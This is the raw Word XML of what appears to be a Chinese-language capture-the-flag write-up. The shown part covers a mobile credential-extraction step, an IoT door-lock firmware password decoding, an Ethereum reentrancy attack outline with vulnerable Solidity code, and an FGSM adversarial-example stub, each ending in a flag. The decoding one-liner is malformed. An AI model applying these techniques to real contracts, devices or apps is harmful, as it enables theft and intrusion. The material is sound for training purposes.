    <w:p w14:paraId="502B7622" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>拦截WebSocket流量解密指令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>echo "HxYdCgUPAQ==" | base64 -d | xxd -p | xargs printf '0x%X\n' $((0x... ^ 0x7F))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5FE506" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>从/data/data/com.mars.rov/debug.log提取凭证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C92DF4" w14:textId="1C937904" w:rsidR="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{M0b1le_R0v3r_0n_M4rs}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8839CB" w14:textId="52F52A7E" w:rsidR="00432D4F" w:rsidRPr="00C97809" w:rsidRDefault="00432D4F" w:rsidP="00432D4F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc190815145"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Iot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="11F4ACEE" w14:textId="226C0BB3" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00432D4F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc190815146"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>智能门锁固件分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="729ADE48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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：doorlock.bin]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>分析IoT门锁固件，找到管理员密码的存储位置和加密方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4E565C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硬件特征</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 基于STM32F103芯片</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 使用SWD调试接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 密码存储区域标记为"SECRET"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A53D7F8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破解过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91290D" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>使用binwalk提取文件系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0970A" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>在0x1FFF7000区域发现6字节数组：[0x8B, 0x9A, 0xA9, 0xB8, 0xC7, 0xD6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F20C4" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:lastRenderedPageBreak/>
        <w:t>逆向加密算法：每个字节减去(0x30 + position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68D9A5" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>解密得到ASCII：S3cr3t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73724BA1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Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{S3cr3t_D00r_L0ck}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC64A4" w14:textId="730B2447" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00A84828" w:rsidP="00A84828">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc190815147"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eth</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="763D9282" w14:textId="5E4E8362" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00A84828">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc190815148"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>星际银行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="332A8881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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>合约地址：0x7F86B...（Ropsten测试网）</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>分析智能合约漏洞，提取合约内全部ETH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3906A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合约特性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4687D3ED" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>solidity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA0563" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D9316" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>function withdraw(uint amount) public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D090F4" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t xml:space="preserve">    require(balances[msg.sender] &gt;= amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4155B1F0" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t xml:space="preserve">    (bool success, ) = msg.sender.call{value: amount}("");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98211A" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t xml:space="preserve">    require(success);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A9EE9" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t xml:space="preserve">    balances[msg.sender] -= amount; // 重入漏洞点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF40E4" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699220E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攻击方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC218C" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>部署攻击合约实施重入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F9CA6" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>在fallback函数中递归调用withdraw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E096D43" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>利用余额更新滞后完成多次提现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB17ED4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Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{Re3ntr4ncy_1n_Sp4ce}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78999D" w14:textId="3CF6072E" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00125320" w:rsidP="00125320">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc190815149"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="670822F1" w14:textId="5716D006" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="002F42DD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc190815150"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>对抗样本迷宫</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="3E3176A1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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：mnist_cnn.h5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>通过生成对抗样本绕过模型分类，使数字7被识别为2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0DABB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技术需求</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• FGSM攻击方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 扰动限制ε ≤ 0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 输入图片hash需匹配原始样本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F3DC0C" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DA754" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:lastRenderedPageBreak/>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B191BBA" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49A315" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>adv_x = x + ε * np.sign(grad)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0247C7" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>print("flag{" + hashlib.md5(adv_x).hexdigest()[:16] + "}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C2938" w14:textId="00358DF8" w:rsidR="000C412A" w:rsidRPr="00C97809" w:rsidRDefault="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{FGSM_4tt4ck_7_to_2}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000C412A" w:rsidRPr="00C978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2253"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3C8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74CB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8C4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B6840"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4592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8778F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB30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C1701"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CF6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B52A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D10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9F54C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A18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F6C64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="148C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780612"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31D4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DC21E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98D8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F5D26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A652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84319"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDDE3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552D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5944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303AB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F56E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324C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43B2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8F3B82"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79E2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46808"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74E6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13430D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F4C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7D59E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AB4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826084"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9B4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474E4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DA6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61E88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FCA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1810F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C62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195731"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E3E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51609"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F308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403C0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52F2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E7303"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="313E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85425"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A39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623843">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="775170881">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1598518980">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1206411338">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2145851959">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="594829752">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="722405722">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="579171351">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1738235776">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1041050749">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="42677108">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1076973165">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1164466076">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1153065358">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="958683176">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="636566693">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="566502660">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="927348821">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1187644175">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="992222705">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="56906395">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="141240864">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="808933443">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1106733632">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1722943854">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="795561187">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1732925458">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="6696047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18"/>
    <w:rsid w:val="0001656F"/>
    <w:rsid w:val="00040101"/>
    <w:rsid w:val="0007048D"/>
    <w:rsid w:val="000758B9"/>
    <w:rsid w:val="0008494E"/>
    <w:rsid w:val="000A7342"/>
    <w:rsid w:val="000C412A"/>
    <w:rsid w:val="000F5409"/>
    <w:rsid w:val="0012081C"/>
    <w:rsid w:val="00125320"/>
    <w:rsid w:val="00280F85"/>
    <w:rsid w:val="002D666F"/>
    <w:rsid w:val="002F42DD"/>
    <w:rsid w:val="0030699F"/>
    <w:rsid w:val="00314D55"/>
    <w:rsid w:val="00357918"/>
    <w:rsid w:val="00386ADC"/>
    <w:rsid w:val="0040252A"/>
    <w:rsid w:val="00422C11"/>
    <w:rsid w:val="00432D4F"/>
    <w:rsid w:val="004732E2"/>
    <w:rsid w:val="004871D6"/>
    <w:rsid w:val="004D52D0"/>
    <w:rsid w:val="004E1E18"/>
    <w:rsid w:val="005D4495"/>
    <w:rsid w:val="005F6C70"/>
    <w:rsid w:val="00640EBB"/>
    <w:rsid w:val="006563B5"/>
    <w:rsid w:val="00666B44"/>
    <w:rsid w:val="00674C59"/>
    <w:rsid w:val="006E6124"/>
    <w:rsid w:val="00731958"/>
    <w:rsid w:val="00813CB9"/>
    <w:rsid w:val="00894C06"/>
    <w:rsid w:val="008A34B2"/>
    <w:rsid w:val="008A5C04"/>
    <w:rsid w:val="008A6BB9"/>
    <w:rsid w:val="008D417C"/>
    <w:rsid w:val="008F0362"/>
    <w:rsid w:val="008F4F4A"/>
    <w:rsid w:val="0095212E"/>
    <w:rsid w:val="00990C4B"/>
    <w:rsid w:val="00A1477C"/>
    <w:rsid w:val="00A1514C"/>
    <w:rsid w:val="00A84467"/>
    <w:rsid w:val="00A84828"/>
    <w:rsid w:val="00AB4F98"/>
    <w:rsid w:val="00AC3439"/>
    <w:rsid w:val="00AE63A7"/>
    <w:rsid w:val="00AF053A"/>
    <w:rsid w:val="00B27653"/>
    <w:rsid w:val="00BE3524"/>
    <w:rsid w:val="00BF0316"/>
    <w:rsid w:val="00BF10CA"/>
    <w:rsid w:val="00C97809"/>
    <w:rsid w:val="00CA1913"/>
    <w:rsid w:val="00CE0689"/>
    <w:rsid w:val="00D87851"/>
    <w:rsid w:val="00DA7F0E"/>
    <w:rsid w:val="00DE0ACB"/>
    <w:rsid w:val="00DF5EBA"/>
    <w:rsid w:val="00E2797F"/>
    <w:rsid w:val="00EA6E7E"/>
    <w:rsid w:val="00EF2B0A"/>
    <w:rsid w:val="00F54997"/>
    <w:rsid w:val="00F815A2"/>
    <w:rsid w:val="00FE5884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316C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61E0BCFA-587F-4156-A6EA-56000C95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791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79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9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91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91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91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91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91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91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91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579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579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5791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5791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5791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5791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5791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5791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579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57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79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579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79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579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791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5791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579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5791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5791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66B44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66B44"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00666B44"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:left="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00666B4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4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5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73AC-B8A3-4BE5-B6EB-2FD7E7EA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6</Pages>
  <Words>2118</Words>
  <Characters>12077</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>100</Lines>
  <Paragraphs>28</Paragraphs>
  <ScaleCrop>false</ScaleCrop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ine him</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>obrine him</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-18T14:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-19T09:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>